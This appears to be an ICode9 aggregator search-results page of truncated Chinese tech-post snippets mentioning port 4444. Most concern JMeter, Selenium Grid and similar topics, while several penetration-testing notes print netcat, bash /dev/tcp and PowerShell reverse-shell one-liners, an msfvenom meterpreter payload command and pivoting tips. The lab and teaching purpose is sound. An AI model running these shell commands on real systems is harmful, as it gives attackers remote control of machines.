ICode9

精准搜索请尝试: 精确搜索
  • jmeter测试操作32021-12-17 20:59:27

    jmeter链接数据库             监控后端Linux服务的cpu和内存步骤: 1:在jmeter中的lib/ext目录下,放第三方插件(标准/扩展) 2:通过远程连接工具将severAgent放在Linux服务器上。进行解压,   unzip - ServerAgent-2.2.1.jar 3:开放4444端口 /sbin/iptables -I INPUT -p

  • nc连接获取shell2021-12-09 13:30:50

    1.渗透过程中免不了获取shell,可以通过nc工具连接,当然还有其他很多的工具,只不过nc默认安装在linux中,比较方便。 nc正向连接,防火墙不阻挡外来流量: 客户端: nc -e cmd 192.168.0.18 4444 #主动连接客户端的4444端口 服务端: nc -lvvp 4444 #监听4444端口    nc反向连接,防火墙

  • 利用Docker容器技术构建自动化分布式web测试集群Selenium Grid2021-12-04 10:35:14

    为此我们提出一个更高效的解决方案:使用Docker+Selenium Grid。 Selenium Grid是一个分布式WebUI测试工具,可以将测试流程分发到多台服务器上,并行地执行。 Selenium Grid架构中包含两个主要角色:Hub是中心点控制节点,而Node是Selenium的工作节点,它们注册到Hub上,并会操作浏览器执行由Hu

  • 【渗透测试笔记】之【内网渗透——传输层隧道(PowerCat的使用)】2021-10-22 14:33:17

    写在前面:PowerCat是PowerShell版本的nc,主要用于windows平台。 1 实验环境 kali(攻击机,外网地址:192.168.8.48) Windows2012(边界服务器,外网地址:192.168.8.57,内网地址:10.1.1.10) CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13) DC(内网地址:10.1.1.2) 2 下载与部署 2.1 下

  • 【KALI使用】6 工具 NETCAT2021-09-05 13:32:04

    目录 NETCAT ——NC功能:网络工具中的瑞士军刀——小身材、大智慧侦听模式 / 传输模式telnet / 获取banner信息传输文本信息传输文件/目录可以远程电子取证 传输文件传输目录 加密传输文件流媒体服务器端口扫描远程克隆硬盘 NETCAT ——NC功能: 网络工具中的瑞士军刀——

  • 交互式shell2021-08-26 23:01:03

    一、学习链接传送门 https://saucer-man.com/information_security/233.html 二、命令记录 1、python pth方式 python -c 'import pty; pty.spawn("/bin/bash")' 2、升级nc为完全交互 攻击机本地执行 首先检查当前终端和STTY信息 $ echo $TERM $ stty -a nc开启监听 $ nc

  • 浩若烟海事半功倍|利用Docker容器技术构建自动化分布式web测试集群Selenium Grid2021-06-27 22:01:28

    原文转载自「刘悦的技术博客」https://v3u.cn/a_id_195 “世界上有那么多城市,城市里有那么多的酒馆,可她,却偏偏走进了我的…”,这是电影《卡萨布拉卡》中的一句著名独白,投射到现实生活中,与之类似的情况不胜枚举,这世界上有那么多的系统,系统中有那么多的浏览器,在只有一台测试机的

  • OSCP Security Technology - Netcat2021-06-19 21:05:42

    OSCP Security Technology - Netcat Netcat Download Netcat for windows from following website. https://eternallybored.org/misc/netcat/ nc -nv 192.168.2.28 443 nc -nv 192.168.2.28 80 nc -nv 192.168.2.28 111 nc -nv 192.168.2.28 112 Method 1 Listen on port

  • 几个反弹shell2021-06-09 23:01:45

    几个反弹shell 作者: admin时间: 2021-05-27分类: 信息收集 nc -e /bin/bash 192.168.137.17 4444(www-data)bash -i >& /dev/tcp/192.168.137.17/4444 0>&1(www-data)echo "bash -i >& /dev/tcp/192.168.137.17/4444 0>&1" | bash(www-data)ssh use

  • jmeter服务器压测环境准备(Linux)2021-05-23 20:00:10

    一、jmeter环境准备 打开Xshell点击添加文件,然后将后缀为 .zip的压缩包拖拽到右边。 添加完文件打开Xshell在里面输入linux命令,输入su root打开管理员设置。 将拖拽的后缀名为 .zip 的压缩包解压到opt文件夹下。   进入admin文件夹里,查看一下文件。 然后再将文件剪切到opt文

  • jmeter服务器压测(Linux)2021-05-21 20:01:59

    使用jmeter 对Linux服务器进行压力测试 1、资源准备 可通过该网址下载jmeter所有插件http://jmeter-plugins.org/downloads/all/ 万能的网盘: 本次所需插件: JMeterPlugins-Extras.jar,JMeterPlugins-Standard.jar ,ServerAgent-2.2.1 将JMeterPlugins-Extras.jar和JMeterPlugins-S

  • jmeter 压力测试2021-05-21 19:33:25

    jmeter压力测试    win/linux   准备工作,通用: 1.Jmeter扩展插件-------显示内存效果图      将JMetePlugins.jar包复制到Jmeter的lib目录下的ext目录下,重新启动。 2.ServerAgent-2.2.1  ------------启动4444端口      linux:1.将该文件解压在/opt文件中       2.

  • ms16-016提权2021-05-08 12:31:30

    ms16-016提权 简介:靶机需32位windows系统 攻击机:kali IP地址为:192.168.32.132 目标机:windows32 IP地址:192.168.32.135 先ping两台主机看是否通 步骤: 1)生成木马,设置本地ip地址192.168.32.132和端口号4444 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.32.132 L

  • Python Json模块中dumps、loads、dump、load函数介绍2021-04-18 21:33:01

    https://www.jb51.net/article/140151.htm   import json name_emb = {'a': '1111', 'b': '2222', 'c': '3333', 'd': '4444'} jsDumps = json.dumps(name_emb) jsLoads = json.loads(js

  • cobalt strike内网穿透2021-02-04 17:32:31

    前提:已经控制内网的一台主机   一.正向连接 1.设置beacon 监听    2.把后门上传到目标内网主机执行,就会监听4444端口 3.在控制的那台内网主机上执行 connect 10.10.1.6:4444 就可以了     二、反向连接 1.设置监听   2.生成后门反弹到控制的主机就可以了     参考:https

  • 内网渗透之反弹shell2021-01-31 22:02:24

    蚕吐丝,蜂酿蜜,人不学,不如物! 场景1 步骤一:将被控服务器shell反弹到本地的4444端口,并监听4444端口(受害机输入) nc -lvp 4444 -e cmd.exe (反弹windows shell) nc -lvp 4444 -e /bin/bash (反弹linux shell) 步骤二:攻击机连接被控服务器的4444端口(攻击机输入) nc -nv 受害机ip 4444

  • 【信息安全】反弹shell2020-12-02 17:01:40

    1、windows-powershell反弹shell kali作为服务端,windows使用powershell连接kali,并将自己的shell给kali windows端 $client = New-Object System.Net.Sockets.TCPClient('192.168.57.200',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$

  • Penetration Test - Selecting_Pen_Testing_Tools(8)2020-11-17 20:35:03

    Remote Access Tools Tool Notes URL SSH Secure shell Included or available in most OSs NCAT Similar to nc, but from Nmap developers https://nmap.org/ncat/ NETCAT Same as nc Included or available in most OSs Proxychains Forces TCP connections t

  • 用selenium做分布式ui自动化测试【多测师】2020-06-12 21:06:27

    grid是进行分布式测试的工具,由一个hub主节点和若干个node代理节点组成 1.下载Selenium Standalone Server下载地址:https://www.seleniumhq.org/download/       2.启动hub和节点 #hub默认端口是4444,node默认端口是5555 java -jar selenium-server-standalone-3.141.59.jar

  • lcx端口转发2020-05-16 14:58:08

              本机  192.168.58.1     肉机1   肉机2   肉鸡1 和肉鸡2 都开启防火墙  只允许80端口开放 用nmap扫描一下         本机访问肉鸡1           肉鸡1  访问肉鸡2            本机:本机:lcx.exe -listen 4444 5555  本机监听4444端口  55

  • NETCAT(NC)工具使用2020-05-05 10:38:55

    NC是什么?        NC是NETCAT的简写,有着网络界的瑞士军刀美誉。因为他短小精悍,功能实用,被设计为一个简单,可靠的网络工具。 NC的作用 (1)传输文本信息 (2)传输文件/目录 (3)加密传输文件 (4)远程控制/木马 (5)加密传输文件 (6)流媒体服务器 (7)端口扫描 (8)远程克隆硬盘   NC常用的参数   -

  • Netcat2020-03-27 23:00:47

    nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流 网络中的瑞士军刀 1.netcat常用参数 -l:设置netcat处于监听状态等待连接 -L:设置netcat处于监听状态等待连接,当客户端断开,服务端依旧回到等待状态 -p:本地监听端口号 -v:显示端口信息,如果使用-vv的话,则显示更加详

  • 内网渗透之——内网转发2020-03-16 14:38:27

    目的 渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入 需要转发的情况 1.A可以访问B的80端口,但是不能访问B的3389端口 2.A可以访问B,B可以访问C,但是A不可以访问C,需要通过B转发数据,让A和C进行通信 代理方式 正向代理 正向代理是服务

  • 各种反弹shell方法总结2020-01-30 21:02:48

    获取shell的方法总结: shell分为两种,一种是正向shell,另一种是反向shell。如果客户端连接服务器,客户端主动连接服务器,就称为正向shell。如果客户端连接服务器,服务器想要获得客户端的shell,就称为反向shell。 反向shell通常在开启了防护措施的目标机器上,例如防火墙、端口转发等。 (1)正

  • ALPHA_8、ARGB_4444、ARGB_8888和RGB_565的区别2019-08-19 11:37:40

    原文链接:https://blog.csdn.net/fence2012/article/details/44928871 在Android的Bitmap.Config中有四个枚举类型:ALPHA_8、ARGB_4444、ARGB_8888和RGB_565 下面是这四种类型的详细解释: ALPHA_8:每个像素都需要1(8位)个字节的内存,只存储位图的透明度,没有颜色

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有